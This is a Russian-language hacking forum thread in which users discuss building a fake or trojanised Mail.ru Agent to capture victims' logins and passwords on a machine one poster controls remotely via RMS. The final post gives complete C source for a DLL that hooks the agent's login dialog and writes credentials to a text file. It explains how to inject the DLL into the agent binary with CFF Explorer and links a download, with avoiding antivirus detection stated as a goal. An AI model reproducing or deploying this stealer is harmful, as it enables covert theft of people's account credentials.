У кого-нибудь есть фейк mail agent? Не важно каким образом реализована доставка пассов до хозяина ))) Есть доступ к компу через RMS, так что могу сам забирать/ Ну что-то типа: юзер вбил пароль и логин и они сохранились в папочку на его компе. А я просто забрал их
Banality, не поверишь, прежде чем писать 100 раз там посмотрел. Мне нужен фейк который никуда ничего не отправляет и соотв. не так палится антивирусами.
из моих скудных знаний - добавить в импорт ориг.агента свою либу, которая в свою очередь ставит новый адрес оконной процедуры (для того окошка, где лежит кнопка "ок"). но это только в том случае, если у тебя есть доступ к папке с агентом, чтобы подменить бинарник. в итоге рабочий агент, пароли в файлике или куда там тебе надо. но это очень убого.
а сделать тупой феик с записью текстбоксов в фаил .тхт , сунуть его жертве, ну там ярлычок на раб.столе оставить? а автор потом как говорит его заберет
простейший быдлокод. дальше CFF Explorer'ом добавляем скомпиленную либу в импорт магента. профит. правда здесь не запилено определение домена, там mail.ru, bk.ru етц. и есть привязка к русскому языку. Код: #pragma comment(linker, "/MERGE:.text=.code") #pragma comment(linker, "/MERGE:.rdata=.code") #pragma comment(linker, "/MERGE:.data=.code") #pragma comment(linker, "/SECTION:.code,EWR") #include <windows.h> LONG OldWndProc; __declspec(dllexport) void __cdecl inj(void){} LRESULT CALLBACK NewWndProc(HWND Hwnd, UINT Message, WPARAM wParam, LPARAM lParam) { switch(Message) { case WM_COMMAND: switch(wParam) { case IDOK: HWND hWndA = FindWindowEx(Hwnd, 0, "#32770", ""); if(hWndA) { HWND hLogin = FindWindowEx(hWndA, 0, "ComboBox", NULL); HWND hPass = FindWindowEx(hWndA, 0, "Edit", NULL); char mLogin[260]; char mPass[260]; GetWindowText(hLogin,mLogin,260); GetWindowText(hPass,mPass,260); DWORD Written; HANDLE hFile = CreateFile("C:\\log_agent.txt", GENERIC_WRITE, 0, NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0); SetFilePointer(hFile, 0, NULL, FILE_END); WriteFile(hFile, mLogin, lstrlen(mLogin), &Written, NULL); WriteFile(hFile, ":", 1, &Written, NULL); WriteFile(hFile, mPass, lstrlen(mPass), &Written, NULL); WriteFile(hFile, "\r\n", 2, &Written, NULL); CloseHandle(hFile); MessageBox(Hwnd, "Пароль сохранён", "Ok", MB_OK); } break; } break; } return CallWindowProc((WNDPROC)OldWndProc, Hwnd, Message, wParam, lParam); } DWORD WINAPI Creation(LPVOID) { refind: HWND hWnd = FindWindow("#32770", "Авторизация пользователя"); if(!hWnd){Sleep(500); goto refind;} OldWndProc = SetWindowLong(hWnd, GWL_WNDPROC, (long)NewWndProc); return TRUE; } BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if(fdwReason == DLL_PROCESS_ATTACH) CreateThread(0, NULL, (LPTHREAD_START_ROUTINE)&Creation, NULL, NULL, NULL); return TRUE; } пример для десятой версии http://zalil.ru/33051900